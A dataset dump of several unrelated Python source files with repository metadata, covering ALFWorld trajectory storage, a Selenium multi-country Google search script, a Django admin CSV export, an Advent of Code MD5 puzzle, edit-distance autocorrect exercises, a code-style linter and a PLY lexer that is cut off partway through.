3c1675a2a9274be019b322c8830f740dbd48fb14
| 6,063
|
py
|
Python
|
alfworld/agents/utils/traj_process.py
|
roy860328/VSGM
|
3ec19f9cf1401cecf45527687936b8fe4167f672
|
[
"MIT"
] | 6
|
2021-05-22T15:33:42.000Z
|
2022-01-12T03:34:39.000Z
|
alfworld/agents/utils/traj_process.py
|
roy860328/VSGM
|
3ec19f9cf1401cecf45527687936b8fe4167f672
|
[
"MIT"
] | 1
|
2021-06-19T10:04:13.000Z
|
2021-06-20T03:37:23.000Z
|
alfworld/agents/utils/traj_process.py
|
roy860328/VSGM
|
3ec19f9cf1401cecf45527687936b8fe4167f672
|
[
"MIT"
] | null | null | null |
import os
import cv2
import json
import numpy as np
import h5py
from PIL import Image
TASK_TYPES = {1: "pick_and_place_simple",
2: "look_at_obj_in_light",
3: "pick_clean_then_place_in_recep",
4: "pick_heat_then_place_in_recep",
5: "pick_cool_then_place_in_recep",
6: "pick_two_obj_and_place"}
def save_trajectory(envs, store_states, task_desc_strings, expert_actions, still_running_masks):
print("=== SAVE BATCH ===")
TRAIN_DATA = "TRAIN_DATA.json"
for i, thor in enumerate(envs):
save_data_path = thor.env.save_frames_path
print("=== save one episode len ===", len(expert_actions))
print("=== save path ===", save_data_path)
data = {
"task_desc_string": [],
"expert_action": [],
"sgg_meta_data": [],
"rgb_image": [],
}
img_name = 0
for store_state, task_desc_string, expert_action, still_running_mask in \
zip(store_states, task_desc_strings, expert_actions, still_running_masks):
if int(still_running_mask[i]) == 0:
break
_task_desc_string = task_desc_string[i]
_expert_action = expert_action[i]
rgb_image = store_state[i]["rgb_image"]
img_path = os.path.join(save_data_path, '%09d.png' % img_name)
cv2.imwrite(img_path, rgb_image)
data["task_desc_string"].append(_task_desc_string)
data["expert_action"].append(_expert_action)
data["rgb_image"].append(img_path)
data["sgg_meta_data"].append(store_state[i]["sgg_meta_data"])
img_name += 1
with open(os.path.join(save_data_path, TRAIN_DATA), 'w') as f:
json.dump(data, f)
def save_exploration_trajectory(envs, exploration_frames, sgg_meta_datas):
print("=== SAVE EXPLORATION BATCH ===")
TRAIN_DATA = "TRAIN_DATA.json"
for i, thor in enumerate(envs):
save_data_path = thor.env.save_frames_path
print("=== save exploration one episode len ===", len(sgg_meta_datas[i]))
print("=== save exploration path ===", save_data_path)
data = {
"exploration_img": [],
"exploration_sgg_meta_data": [],
}
img_name = 0
        for exploration_frame, sgg_meta_data in zip(exploration_frames[i], sgg_meta_datas[i]):
img_path = os.path.join(save_data_path, 'exploration_img%09d.png' % img_name)
cv2.imwrite(img_path, exploration_frame)
data["exploration_img"].append(img_path)
data["exploration_sgg_meta_data"].append(sgg_meta_data)
img_name += 1
with open(os.path.join(save_data_path, TRAIN_DATA), 'r') as f:
ori_data = json.load(f)
with open(os.path.join(save_data_path, TRAIN_DATA), 'w') as f:
data = {**ori_data, **data}
json.dump(data, f)
def get_traj_train_data(tasks_paths, save_frames_path):
# [store_states, task_desc_strings, expert_actions]
transition_caches = []
for task_path in tasks_paths:
transition_cache = [None, None, None]
traj_root = os.path.dirname(task_path)
task_path = os.path.join(save_frames_path, traj_root.replace('../', ''))
with open(task_path + '/TRAIN_DATA.json', 'r') as f:
data = json.load(f)
# store store_states
store_states = []
rgb_array = load_img_with_h5(data["rgb_image"], task_path)
for img, sgg_meta_data in zip(rgb_array, data["sgg_meta_data"]):
store_state = {
"rgb_image": img,
"sgg_meta_data": sgg_meta_data,
}
store_states.append(store_state)
# len(store_state) == 39
transition_cache[0] = store_states
# len(seq_task_desc_strings) == 39
transition_cache[1] = [[task_desc_string] for task_desc_string in data["task_desc_string"]]
# len(seq_target_strings) == 39
transition_cache[2] = [[expert_action] for expert_action in data["expert_action"]]
transition_caches.append(transition_cache)
# import pdb; pdb.set_trace()
return transition_caches
def get_exploration_traj_train_data(tasks_paths, save_frames_path):
# [store_states, task_desc_strings, expert_actions]
exploration_transition_caches = []
for task_path in tasks_paths:
transition_cache = [None, None, None]
traj_root = os.path.dirname(task_path)
task_path = os.path.join(save_frames_path, traj_root.replace('../', ''))
with open(task_path + '/TRAIN_DATA.json', 'r') as f:
data = json.load(f)
# store store_states
store_states = []
rgb_array = load_img_with_h5(data["exploration_img"], task_path, pt_name="exploration_img.pt")
for img, sgg_meta_data in zip(rgb_array, data["exploration_sgg_meta_data"]):
store_state = {
"exploration_img": img,
"exploration_sgg_meta_data": sgg_meta_data,
}
store_states.append(store_state)
# len(store_state) == 39
transition_cache[0] = store_states
exploration_transition_caches.append(transition_cache)
# import pdb; pdb.set_trace()
return exploration_transition_caches
def load_img_with_h5(rgb_img_names, img_dir_path, pt_name="img.pt"):
img_h5 = os.path.join(img_dir_path, pt_name)
if not os.path.isfile(img_h5):
rgb_array = []
for rgb_img_name in rgb_img_names:
rgb_img_name = rgb_img_name.rsplit("/", 1)[-1]
rgb_img_path = os.path.join(img_dir_path, rgb_img_name)
rgb_img = Image.open(rgb_img_path).convert("RGB")
rgb_img = np.array(rgb_img)
rgb_array.append(rgb_img)
hf = h5py.File(img_h5, 'w')
hf.create_dataset('rgb_array', data=rgb_array)
hf.close()
print("Save img data to {}".format(img_h5))
hf = h5py.File(img_h5, 'r')
rgb_array = hf['rgb_array'][:]
return rgb_array
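# Usage note (added): load_img_with_h5 caches decoded frames in an HDF5 file
# (img.pt by default) inside img_dir_path, so repeated calls for the same
# episode read the cache instead of re-decoding every PNG. The path below is
# a placeholder.
# frames = load_img_with_h5(['000000000.png'], '/path/to/episode')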
| 41.527397
| 102
| 0.628072
| 820
| 6,063
| 4.257317
| 0.152439
| 0.036093
| 0.047264
| 0.028072
| 0.567459
| 0.465483
| 0.454025
| 0.454025
| 0.420223
| 0.420223
| 0
| 0.009547
| 0.257133
| 6,063
| 145
| 103
| 41.813793
| 0.765542
| 0.04981
| 0
| 0.295082
| 0
| 0
| 0.146261
| 0.044174
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040984
| false
| 0
| 0.04918
| 0
| 0.114754
| 0.057377
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c1927e4c80951e764d207f99cb77de8d5e6eb00
| 1,850
|
py
|
Python
|
selenium-browser.py
|
steflayanto/international-google-search
|
05cc773b158fe11202fdf39fb515b398a08b7e3c
|
[
"MIT"
] | null | null | null |
selenium-browser.py
|
steflayanto/international-google-search
|
05cc773b158fe11202fdf39fb515b398a08b7e3c
|
[
"MIT"
] | null | null | null |
selenium-browser.py
|
steflayanto/international-google-search
|
05cc773b158fe11202fdf39fb515b398a08b7e3c
|
[
"MIT"
] | null | null | null |
import os, time, pyautogui
import selenium
from selenium import webdriver
from location_reference import country_map
# STATIC SETTINGS
DPI = 125 # Scaling factor of texts and apps in display settings
screen_dims = [x / (DPI/100) for x in pyautogui.size()]
code_map = country_map()
print("International Google Search")
print("Supported Countries: USA, UK, Japan, Canada, Germany, Italy, France, Australia, Brasil, India, Korea, Pakistan")
query = input("Please input Search Query: ")
text = " "
codes = []
while text is not "" and len(codes) != 3:
text = input("Input Country. Input nothing to start search: ").lower()
if text not in code_map.keys():
print("\tERROR: Country not recognized")
continue
codes.append(code_map[text])
print("Starting Search")
# Using Chrome Incognito to access web
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument("--incognito")
drivers = []
# open one window per chosen country; a fixed range(3) broke the assert below
# whenever fewer than three countries were entered
for i in range(len(codes)):
    drivers.append(webdriver.Chrome(chrome_options=chrome_options))
    drivers[i].set_window_position(i * screen_dims[0] / 3, 0)
assert len(codes) == len(drivers)
for i, driver in enumerate(drivers):
# Open the website
code = codes[i]
driver.get('https://www.google.com/ncr')
time.sleep(0.5)
driver.get('https://www.google.com/?gl=' + code)
# print(screen_dims)
# print(driver.get_window_size())
driver.set_window_size(screen_dims[0] / 3, screen_dims[1])
# print(driver.get_window_size())
element = driver.find_element_by_name("q")
element.send_keys(query)
element.submit()
# for i in range(3):
# drivers[i].set_window_position(i * screen_dims[0] / 3, 0)
# driver.manage().window().setPosition(0,0)
# Get Search Box
# element = driver.find_element_by_name("q")
# element.send_keys("Hotels")
# element.submit()
input("Press enter to exit")
| 28.90625
| 120
| 0.702162
| 265
| 1,850
| 4.769811
| 0.430189
| 0.047468
| 0.026108
| 0.028481
| 0.238133
| 0.200158
| 0.134494
| 0.134494
| 0.134494
| 0.134494
| 0
| 0.014221
| 0.163784
| 1,850
| 64
| 121
| 28.90625
| 0.802844
| 0.232973
| 0
| 0
| 0
| 0.027778
| 0.243416
| 0
| 0
| 0
| 0
| 0
| 0.027778
| 1
| 0
| false
| 0
| 0.111111
| 0
| 0.111111
| 0.111111
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c1d0a50a97a1bf750da3e79140c45303971c672
| 2,027
|
py
|
Python
|
registration/admin.py
|
allenallen/interedregistration
|
d6b93bfc33d7bb9bfbabdcdb27b685f3a6be3ea9
|
[
"MIT"
] | null | null | null |
registration/admin.py
|
allenallen/interedregistration
|
d6b93bfc33d7bb9bfbabdcdb27b685f3a6be3ea9
|
[
"MIT"
] | 6
|
2020-02-11T23:05:13.000Z
|
2021-06-10T20:43:51.000Z
|
registration/admin.py
|
allenallen/interedregistration
|
d6b93bfc33d7bb9bfbabdcdb27b685f3a6be3ea9
|
[
"MIT"
] | null | null | null |
import csv
from django.contrib import admin
from django.http import HttpResponse
from .models import Student, SchoolList, Event, ShsTrack, SchoolOfficial
class ExportCsvMixin:
def export_as_csv(self, request, queryset):
meta = self.model._meta
field_names = [field.name for field in meta.fields]
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename={}.csv'.format(meta)
writer = csv.writer(response)
writer.writerow(field_names)
for obj in queryset:
            writer.writerow([getattr(obj, field) for field in field_names])
return response
export_as_csv.short_description = "Export Selected"
@admin.register(SchoolOfficial)
class SchoolOfficialAdmin(admin.ModelAdmin, ExportCsvMixin):
list_display = (
'id', 'last_name', 'first_name', 'school', 'designation', 'course_taken', 'email', 'date_of_birth', 'mobile',
'gender', 'date_registered', 'registered_event')
list_filter = ('registered_event', 'school',)
actions = ['export_as_csv']
@admin.register(Student)
class StudentAdmin(admin.ModelAdmin, ExportCsvMixin):
list_display = (
'id', 'last_name', 'first_name', 'school', 'grade_level', 'shs_track', 'projected_course', 'email',
'date_of_birth', 'mobile',
'gender', 'date_registered', 'registered_event')
actions = ['export_as_csv']
list_filter = ('registered_event', 'school',)
change_list_template = 'change_list.html'
search_fields = ('first_name', 'last_name', 'email')
@admin.register(Event)
class EventAdmin(admin.ModelAdmin):
list_display = ('name', 'start_date', 'end_date')
fieldsets = (
(None, {
'fields': ('name', 'logo', 'event_registration_url')
}),
('Event Date', {
'fields': ('start_date', 'end_date')
}),
)
readonly_fields = ('event_registration_url',)
admin.site.register(SchoolList)
admin.site.register(ShsTrack)
| 30.712121
| 117
| 0.665022
| 222
| 2,027
| 5.837838
| 0.396396
| 0.024691
| 0.033951
| 0.050926
| 0.236111
| 0.188272
| 0.188272
| 0.188272
| 0.188272
| 0.188272
| 0
| 0
| 0.197829
| 2,027
| 65
| 118
| 31.184615
| 0.797048
| 0
| 0
| 0.212766
| 0
| 0
| 0.260483
| 0.021707
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021277
| false
| 0
| 0.085106
| 0
| 0.446809
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c1e8f234365a8d2c0de799db1420fb70afb127b
| 1,251
|
py
|
Python
|
python/src/aoc/year2016/day5.py
|
ocirne/adventofcode
|
ea9b5f1b48a04284521e85c96b420ed54adf55f0
|
[
"Unlicense"
] | 1
|
2021-02-16T21:30:04.000Z
|
2021-02-16T21:30:04.000Z
|
python/src/aoc/year2016/day5.py
|
ocirne/adventofcode
|
ea9b5f1b48a04284521e85c96b420ed54adf55f0
|
[
"Unlicense"
] | null | null | null |
python/src/aoc/year2016/day5.py
|
ocirne/adventofcode
|
ea9b5f1b48a04284521e85c96b420ed54adf55f0
|
[
"Unlicense"
] | null | null | null |
import hashlib
from itertools import islice
from aoc.util import load_input
def search(door_id, is_part1=False, is_part2=False):
i = 0
while True:
md5_hash = hashlib.md5((door_id + str(i)).encode()).hexdigest()
if md5_hash.startswith("00000"):
if is_part1:
yield md5_hash[5]
if is_part2:
pos, char = md5_hash[5:7]
if pos.isnumeric() and 0 <= int(pos) <= 7:
yield int(pos), md5_hash[6]
i += 1
def part1(lines):
"""
>>> part1(['abc'])
'18f47a30'
"""
door_id = lines[0].strip()
return "".join(islice(search(door_id, is_part1=True), 8))
def part2(lines, be_extra_proud=True):
"""
>>> part2(['abc'], False)
'05ace8e3'
"""
result = 8 * [" "]
count = 0
for position, character in search(lines[0].strip(), is_part2=True):
if result[position] == " ":
result[position] = character
count += 1
if count == 8:
return "".join(result)
if be_extra_proud:
print("".join(result))
if __name__ == "__main__":
data = load_input(__file__, 2016, "5")
print(part1(data))
print(part2(data))
| 24.529412
| 71
| 0.529976
| 156
| 1,251
| 4.038462
| 0.397436
| 0.055556
| 0.038095
| 0.044444
| 0.060317
| 0
| 0
| 0
| 0
| 0
| 0
| 0.062574
| 0.322942
| 1,251
| 50
| 72
| 25.02
| 0.681228
| 0.052758
| 0
| 0
| 0
| 0
| 0.013962
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.090909
| 0
| 0.242424
| 0.090909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c1ff1fa706a7ee54f33c5565b4c5b7b1c4bf065
| 7,700
|
py
|
Python
|
src/1-3_autocorrect.py
|
BernhardSchiffer/1-dynamic-programming
|
81d89e6d579a329058a40b0e6c85b45c97db083a
|
[
"MIT"
] | null | null | null |
src/1-3_autocorrect.py
|
BernhardSchiffer/1-dynamic-programming
|
81d89e6d579a329058a40b0e6c85b45c97db083a
|
[
"MIT"
] | null | null | null |
src/1-3_autocorrect.py
|
BernhardSchiffer/1-dynamic-programming
|
81d89e6d579a329058a40b0e6c85b45c97db083a
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# %%
# Assignment Pt. 1: Edit Distances
import numpy as np
from bs4 import BeautifulSoup
import math
vocabulary_file = open('../res/count_1w.txt', 'r')
lines = vocabulary_file.readlines()
vocabulary = dict()
word_count = 0
# Strips the newline character
for line in lines:
line = line.strip()
w = line.split('\t')
word = {'word': w[0], 'count': w[1]}
word_count = word_count + int(w[1])
vocabulary[word['word']] = word
print(len(vocabulary))
print(list(vocabulary.values())[0:5])
gem_doppel = [
("GCGTATGAGGCTAACGC", "GCTATGCGGCTATACGC"),
("kรผhler schrank", "schรผler krank"),
("the longest", "longest day"),
("nicht ausgeloggt", "licht ausgenockt"),
("gurken schaben", "schurkengaben")
]
# %%
def hamming(s1: str, s2: str) -> int:
distance = 0
# pad strings to equal length
if(len(s2) > len(s1)):
s1 = s1.ljust(len(s2), ' ')
else:
s2 = s2.ljust(len(s1), ' ')
# calculate differences in characters
for c1, c2 in zip(s1,s2):
if(c1 != c2):
distance = distance + 1
return distance
assert hamming('GCGTATGAGGCTAACGC', 'GCTATGCGGCTATACGC') == 10
assert hamming('kühler schrank', 'schüler krank') == 13
assert hamming('the longest', 'longest day') == 11
assert hamming('nicht ausgeloggt', 'licht ausgenockt') == 4
assert hamming('gurken schaben', 'schurkengaben') == 14
# %%
def levenshtein(s1: str, s2: str) -> (int, str):
get_values = lambda v: [vv[0] for vv in v]
operations = list()
distances = np.zeros((len(s1)+1, len(s2)+1))
distances[0,:] = [*range(0,len(s2)+1)]
distances[:,0] = [*range(0,len(s1)+1)]
operations.append(['i'*int(i) for i in distances[0,:]])
for row in distances[1:,:]:
operations.append(['d'*int(i) for i in row])
for cidx in range(1,np.shape(distances)[0]):
for ridx in range(1,np.shape(distances)[1]):
c1 = s1[cidx-1]
c2 = s2[ridx-1]
deletion = (distances[cidx-1,ridx] + 1, operations[cidx-1][ridx] + 'd')
insertion = (distances[cidx,ridx-1] + 1, operations[cidx][ridx-1] + 'i')
if(c1 != c2):
substitution = (distances[cidx-1,ridx-1] + 1, operations[cidx-1][ridx-1] + 's')
else:
substitution = (distances[cidx-1,ridx-1] + 0, operations[cidx-1][ridx-1] + 'm')
x = [deletion, insertion, substitution]
minimum = min(get_values(x))
minidx = get_values(x).index(minimum)
distances[cidx,ridx] = minimum
operations[cidx][ridx] = x[minidx][1]
distance = int(distances[-1,-1])
operations = operations[-1][-1]
return (distance, operations)
assert levenshtein('GCGTATGAGGCTAACGC', 'GCTATGCGGCTATACGC') == (3, 'mmdmmmmsmmmmmimmmm')
assert levenshtein('kühler schrank', 'schüler krank') == (6, 'ssmimmmmsddmmmm')
assert levenshtein('the longest', 'longest day') == (8, 'ddddmmmmmmmiiii')
assert levenshtein('nicht ausgeloggt', 'licht ausgenockt') == (4, 'smmmmmmmmmmsmssm')
assert levenshtein('gurken schaben', 'schurkengaben') == (7, 'siimmmmmsdddmmmm')
# %%
# Assignment Pt. 2: Auto-Correct
def suggest(w: str, dist, max_cand=5) -> list:
"""
w: word in question
dist: edit distance to use
max_cand: maximum of number of suggestions
returns a list of tuples (word, dist, score) sorted by score and distance"""
if w in vocabulary:
Pw = math.log(int(vocabulary[w]['count'])/word_count)
return [(w, 0, Pw)]
suggestions = list()
for word in list(vocabulary.values())[:]:
distance, _ = dist(w, word['word'])
Pw = math.log(int(word['count'])/word_count)
suggestions.append((word['word'], distance, 0.5* math.log(1/distance) + Pw))
    # sort by distance first, then by descending score, as the docstring states
    suggestions.sort(key=lambda s: (s[1], -s[2]))
return suggestions[:max_cand]
examples = [
"pirates", # in-voc
"pirutes", # pirates?
"continoisly", # continuosly?
]
for w in examples[:]:
print(w, suggest(w, levenshtein, max_cand=3))
# sample result; your scores may vary!
# pirates [('pirates', 0, -11.408058827802126)]
# pirutes [('pirates', 1, -11.408058827802126), ('minutes', 2, -8.717825438953103), ('viruses', 2, -11.111468702571859)]
# continoisly [('continously', 1, -15.735337826575178), ('continuously', 2, -11.560071979871001), ('continuosly', 2, -17.009283000138204)]
# %%
# Assignment Pt. 3: Needleman-Wunsch
# reading content
file = open("../res/de.xml", "r")
contents = file.read()
# parsing
soup = BeautifulSoup(contents, 'xml')
# get characters
keys = soup.find_all('char')
keyboard = {}
# display content
for key in keys:
k = {'value': key.string}
# get key of character
parent = key.parent
k['left'] = parent['left']
k['top'] = parent['top']
k['width'] = parent['width']
k['height'] = parent['height']
k['fingerIndex'] = parent['fingerIndex']
keyboard[k['value']] = k
# get special keys
specialKeys = soup.find_all('specialKey')
for key in specialKeys:
if key['type'] == 'space':
keyboard[' '] = {
'value': ' ',
'left': key['left'],
'top': key['top'],
'width': key['width'],
'height': key['height']
}
def keyboardsim(s1: str, s2: str) -> float:
key1 = keyboard[s1]
key2 = keyboard[s2]
key1_pos = (int(key1['left']), int(key1['top']))
key2_pos = (int(key2['left']), int(key2['top']))
return math.dist(key1_pos, key2_pos)
def nw(s1: str, s2: str, d: float = 0, sim = keyboardsim) -> float:
get_values = lambda v: [vv[0] for vv in v]
operations = list()
scores = np.zeros((len(s1)+1, len(s2)+1))
scores[0,:] = [i*-1 for i in [*range(0,len(s2)+1)]]
scores[:,0] = [i*-1 for i in [*range(0,len(s1)+1)]]
operations.append(['-'*int(-i) for i in scores[0,:]])
for row in scores[1:,:]:
operations.append(['-'*int(-i) for i in row])
for cidx in range(1,np.shape(scores)[0]):
for ridx in range(1,np.shape(scores)[1]):
c1 = s1[cidx-1]
c2 = s2[ridx-1]
deletion = (scores[cidx-1,ridx] - 1, operations[cidx-1][ridx] + '-')
insertion = (scores[cidx,ridx-1] - 1, operations[cidx][ridx-1] + '-')
if(c1 != c2):
cost = sim(c1, c2)
substitution = (scores[cidx-1,ridx-1] - cost, operations[cidx-1][ridx-1] + '-')
else:
substitution = (scores[cidx-1,ridx-1] + 1, operations[cidx-1][ridx-1] + '+')
x = [deletion, insertion, substitution]
maximum = max(get_values(x))
minidx = get_values(x).index(maximum)
scores[cidx,ridx] = maximum
operations[cidx][ridx] = x[minidx][1]
score = int(scores[-1,-1])
operations = operations[-1][-1]
return (score, operations)
#return score
assert nw('GCGTATGAGGCTAACGC', 'GCTATGCGGCTATACGC', sim=lambda x,y: 1) == (12, '++-++++-+++++-++++')
assert nw('kühler schrank', 'schüler krank', sim=lambda x,y: 1) == (3, '--+-++++---++++')
assert nw('the longest', 'longest day', sim=lambda x,y: 1) == (-1, '----+++++++----')
assert nw('nicht ausgeloggt', 'licht ausgenockt', sim=lambda x,y: 1) == (8, '-++++++++++-+--+')
assert nw('gurken schaben', 'schurkengaben', sim=lambda x,y: 1) == (2, '---+++++----++++')
# How does your suggest function behave with nw and a keyboard-aware similarity?
print(nw('GCGTATGAGGCTAACGC', 'GCTATGCGGCTATACGC'))
print(nw('kühler schrank', 'schüler krank'))
print(nw('the longest', 'longest day'))
print(nw('nicht ausgeloggt', 'licht ausgenockt'))
print(nw('gurken schaben', 'schurkengaben'))
# %%
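# Added sketch (not in the original): suggest() expects a *distance* (lower is
# better), while nw() returns an alignment *score* (higher is better), so nw
# cannot be passed to suggest() unchanged; a non-positive "distance" would
# also break the math.log(1/distance) term. A hedged adaptation ranks words by
# descending nw score instead. Only the first 1000 vocabulary entries are
# scanned to keep the sketch fast, and it assumes every character of every
# word appears in the parsed keyboard layout.
def suggest_nw(w, max_cand=5):
    scored = [(v['word'], nw(w, v['word'])[0]) for v in list(vocabulary.values())[:1000]]
    scored.sort(key=lambda s: -s[1])
    return scored[:max_cand]

print(suggest_nw('pirutes', max_cand=3))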
| 32.352941
| 138
| 0.587662
| 987
| 7,700
| 4.558257
| 0.222898
| 0.017782
| 0.024005
| 0.022227
| 0.289398
| 0.206046
| 0.166037
| 0.148033
| 0.072238
| 0.072238
| 0
| 0.050995
| 0.223247
| 7,700
| 237
| 139
| 32.489451
| 0.701221
| 0.123117
| 0
| 0.129032
| 0
| 0
| 0.168159
| 0
| 0
| 0
| 0
| 0
| 0.096774
| 1
| 0.032258
| false
| 0
| 0.019355
| 0
| 0.090323
| 0.051613
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c2312e967df908333d00837244d79e34fe4f564
| 2,845
|
py
|
Python
|
scripts/code_standards/code_standards.py
|
dolphingarlic/sketch-frontend
|
e646b7d51405e8a693f45472aa3cc6991a6f38af
|
[
"X11"
] | 1
|
2020-12-06T03:40:53.000Z
|
2020-12-06T03:40:53.000Z
|
scripts/code_standards/code_standards.py
|
dolphingarlic/sketch-frontend
|
e646b7d51405e8a693f45472aa3cc6991a6f38af
|
[
"X11"
] | null | null | null |
scripts/code_standards/code_standards.py
|
dolphingarlic/sketch-frontend
|
e646b7d51405e8a693f45472aa3cc6991a6f38af
|
[
"X11"
] | null | null | null |
#!/usr/bin/env python2.6
# -*- coding: utf-8 -*-
from __future__ import print_function
import optparse
import path_resolv
from path_resolv import Path
def check_file(f, show_info, override_ignores):
text = f.read()
if ("@code standards ignore file" in text) and (not override_ignores):
return
if "\r" in text:
raise Exception("FATAL - dos endlines in %s" %(f))
for i, line in enumerate(text.split("\n")):
def warn(text):
print("%30s %30s :%03d" %("WARNING - " + text, f, i))
def info(text):
if show_info:
print("%30s %30s :%03d" %("INFO - " + text, f, i))
if "\t" in line:
warn("tabs present")
# for now, ignore Eclipse blank comment lines
if line.endswith(" ") and line.strip() != "*":
warn("trailing whitespace")
# the following can be ignored
if "@code standards ignore" in line and not override_ignores:
continue
# spaces don't show up as much for variable indent
relevant_line = line.lstrip('/').strip()
if float(len(line)) * 0.7 + float(len(relevant_line)) * 0.3 > 90:
warn("long line")
# the following only apply to uncommented code
if line.lstrip().startswith("//"):
continue
# the following do not apply to this file
if f.endswith("build_util/code_standards.py"):
continue
if "System.exit" in line:
warn("raw system exit")
if "DebugOut.assertSlow" in line:
info("debug assert slow call")
def warn(text):
print("%30s %30s" %("WARNING - " + text, f))
if f.endswith(".java") and not "http://creativecommons.org/licenses/BSD/" in text:
warn("no license")
def main(srcdir, file_extensions, **kwargs):
assert type(file_extensions) == list
for root, dirs, files in Path(srcdir).walk():
for f in files:
f = Path(root, f)
if f.splitext()[-1][1:] in file_extensions:
check_file(f, **kwargs)
if __name__ == "__main__":
cmdopts = optparse.OptionParser(usage="%prog [options]")
cmdopts.add_option("--srcdir", default=Path("."),
help="source directory to look through")
cmdopts.add_option("--file_extensions", default="java,scala,py,sh",
help="comma-sepated list of file extensions")
cmdopts.add_option("--show_info", action="store_true",
help="show info for command")
cmdopts.add_option("--override_ignores", action="store_true",
help="ignore \"@code standards ignore [file]\"")
options, args = cmdopts.parse_args()
options.file_extensions = options.file_extensions.split(",")
if not options.show_info:
print("use --show_info to show more notices")
main(**options.__dict__)
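# Illustrative invocation (not part of the original file), built from the
# optparse options defined above:
#   python code_standards.py --srcdir src --file_extensions java,py --show_info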
| 34.695122
| 86
| 0.59754
| 366
| 2,845
| 4.516393
| 0.418033
| 0.059286
| 0.038717
| 0.025408
| 0.026618
| 0.026618
| 0
| 0
| 0
| 0
| 0
| 0.012925
| 0.265729
| 2,845
| 81
| 87
| 35.123457
| 0.778363
| 0.088576
| 0
| 0.084746
| 0
| 0
| 0.228538
| 0.010828
| 0
| 0
| 0
| 0
| 0.050847
| 1
| 0.084746
| false
| 0
| 0.067797
| 0
| 0.169492
| 0.084746
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c25269f1d545577e247a812c7d95d25ce72bbfe
| 2,368
|
py
|
Python
|
grease/scanner.py
|
JorgeRubio96/grease-lang
|
94a7cf9f01339ae2aac2c1fa1fefb623c32fffc9
|
[
"MIT"
] | null | null | null |
grease/scanner.py
|
JorgeRubio96/grease-lang
|
94a7cf9f01339ae2aac2c1fa1fefb623c32fffc9
|
[
"MIT"
] | null | null | null |
grease/scanner.py
|
JorgeRubio96/grease-lang
|
94a7cf9f01339ae2aac2c1fa1fefb623c32fffc9
|
[
"MIT"
] | 1
|
2018-10-09T22:57:34.000Z
|
2018-10-09T22:57:34.000Z
|
import ply.lex as lex
from grease.core.indents import Indents
reserved = {
'var': 'VAR',
'if': 'IF',
'else': 'ELSE',
'scan': 'SCAN',
'print': 'PRINT',
'and': 'AND',
'or': 'OR',
'Bool': 'BOOL',
'Int': 'INT',
'Float': 'FLOAT',
'Char': 'CHAR',
'fn': 'FN',
'interface': 'INTERFACE',
'import': 'IMPORT',
'struct':'STRUCT',
'while':'WHILE',
'alias':'ALIAS',
'as':'AS',
'gt': 'GT',
'ge': 'GE',
'lt': 'LT',
'le': 'LE',
'eq': 'EQ',
'not':'NOT',
'from': 'FROM',
'return': 'RETURN',
'true': 'TRUE',
'false': 'FALSE'
}
tokens = [
'ID', 'CONST_INT', 'CONST_REAL', 'CONST_STR', 'CONST_CHAR',
'ARROW', 'SEMICOLON', 'COLON', 'COMMA', 'DOT', 'EQUALS', 'NEW_LINE',
'OPEN_BRACK','CLOSE_BRACK', 'OPEN_PAREN', 'CLOSE_PAREN', 'PLUS', 'MINUS',
'TIMES', 'DIVIDE', 'AMP', 'INDENT', 'DEDENT'
] + list(reserved.values())
t_DOT = r'\.'
t_SEMICOLON = r'\;'
t_COLON = r'\:'
t_COMMA = r'\,'
t_OPEN_BRACK = r'\['
t_CLOSE_BRACK = r'\]'
t_EQUALS = r'\='
t_OPEN_PAREN = r'\('
t_CLOSE_PAREN = r'\)'
t_PLUS = r'\+'
t_MINUS = r'\-'
t_TIMES = r'\*'
t_DIVIDE = r'\/'
t_AMP = r'\&'
t_ARROW = r'\-\>'
t_ignore = ' '
def t_ignore_SINGLE_COMMENT(t):
r'\#.*\n'
t.lexer.lineno += 1
def t_ignore_MULTI_COMMENT(t):
r'\/\*[\s\S]*\*\/\s*'
t.lexer.lineno += t.value.count('\n')
def t_ID(t):
    r'[a-zA-Z_][a-zA-Z0-9_]*'
    t.type = reserved.get(t.value, 'ID')
    # reserved maps 'true'/'false' to TRUE/FALSE and no CONST_BOOL token
    # exists, so convert the boolean literals here
    if t.type == 'TRUE':
        t.value = True
    elif t.type == 'FALSE':
        t.value = False
    return t
def t_CONST_REAL(t):
r'[0-9]+\.[0-9]+'
